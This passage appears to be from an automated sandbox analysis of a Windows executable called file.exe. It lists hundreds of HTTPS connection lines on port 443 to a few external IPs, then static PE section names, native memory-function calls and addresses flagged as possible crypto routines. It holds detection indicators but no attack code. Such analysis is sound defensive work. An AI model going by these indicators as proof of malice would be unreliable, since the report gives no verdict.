Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:50019 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C52ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C52ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C56B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C56B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C56B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C50F280
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5035A0 0_2_6C5035A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57545C 0_2_6C57545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C515440 0_2_6C515440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C545C10 0_2_6C545C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C552C10 0_2_6C552C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57AC00 0_2_6C57AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57542B 0_2_6C57542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C52D4D0 0_2_6C52D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5164C0 0_2_6C5164C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C546CF0 0_2_6C546CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50D4E0 0_2_6C50D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C516C80 0_2_6C516C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5634A0 0_2_6C5634A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56C4A0 0_2_6C56C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C530512 0_2_6C530512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C52ED10 0_2_6C52ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C51FD00 0_2_6C51FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C540DD0 0_2_6C540DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5685F0 0_2_6C5685F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C529E50 0_2_6C529E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C543E50 0_2_6C543E50
